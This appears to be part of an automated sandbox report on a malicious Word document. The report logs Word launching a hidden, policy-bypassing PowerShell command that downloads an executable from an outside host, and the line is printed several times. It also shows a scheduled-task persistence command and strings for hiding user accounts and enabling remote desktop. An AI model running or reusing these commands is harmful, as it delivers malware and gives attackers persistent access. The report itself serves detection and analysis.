Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe')
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe')
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe')
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe') Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe') Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe') Jump to behavior
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 8_2_05893E1C push esi; ret 8_2_05893E1F
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 20_2_05F06979 push ebx; retn 0000h 20_2_05F0697A
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 20_2_05F06930 push ebx; retn 0000h 20_2_05F06932
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 20_2_05F06C80 push ebp; retn 0000h 20_2_05F06C82
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 20_2_05F06850 push edx; retn 0000h 20_2_05F06852
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 20_2_05F06808 push edx; retn 0000h 20_2_05F0680A
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 20_2_05F06AE0 push esp; retn 0000h 20_2_05F06AE2
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 20_2_05F06A99 push esp; retn 0000h 20_2_05F06A9A
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 20_2_05F03E1C push esi; ret 20_2_05F03E1F
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 29_2_05503E1C push esi; ret 29_2_05503E1F
Binary contains a suspicious time stamp
Source: explorer[1].exe.0.dr Static PE information: 0xA015504D [Tue Feb 9 02:02:53 2055 UTC]

Persistence and Installation Behavior
barindex
Drops PE files with benign system names
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\explorer.exe Jump to dropped file
Tries to download and execute files (via powershell)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe')
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe')
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe')
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe') Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe') Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe') Jump to behavior
Drops PE files
Source: C:\Users\user\AppData\Roaming\explorer.exe File created: C:\Users\user\AppData\Roaming\eDdYRRbouy.exe Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\explorer.exe Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\explorer[1].exe Jump to dropped file

Boot Survival
barindex
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\AppData\Roaming\explorer.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eDdYRRbouy" /XML "C:\Users\user\AppData\Local\Temp\tmpE14B.tmp

Hooking and other Techniques for Hiding and Protection
barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Windows\SysWOW64\:Zone.Identifier read attributes | delete Jump to behavior
Contains functionality to hide user accounts
Source: explorer.exe, 00000008.00000002.971704816.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: explorer.exe, 00000008.00000002.971704816.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
Source: explorer.exe, 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: explorer.exe, 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
Source: MSBuild.exe, 00000011.00000003.963529024.00000000006B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: MSBuild.exe, 00000011.00000003.963529024.00000000006B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
Source: MSBuild.exe, 00000011.00000000.956682708.0000000000414000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: MSBuild.exe, 00000011.00000000.956682708.0000000000414000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
Source: MSBuild.exe, 00000011.00000003.963466175.00000000006A5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: MSBuild.exe, 00000011.00000003.963466175.00000000006A5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
Source: MSBuild.exe, 00000011.00000003.963980442.00000000006B7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: MSBuild.exe, 00000011.00000003.963980442.00000000006B7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
Source: explorer.exe, 00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: explorer.exe, 00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
Source: explorer.exe, 0000001D.00000002.1032860739.00000000028B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: explorer.exe, 0000001D.00000002.1032860739.00000000028B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
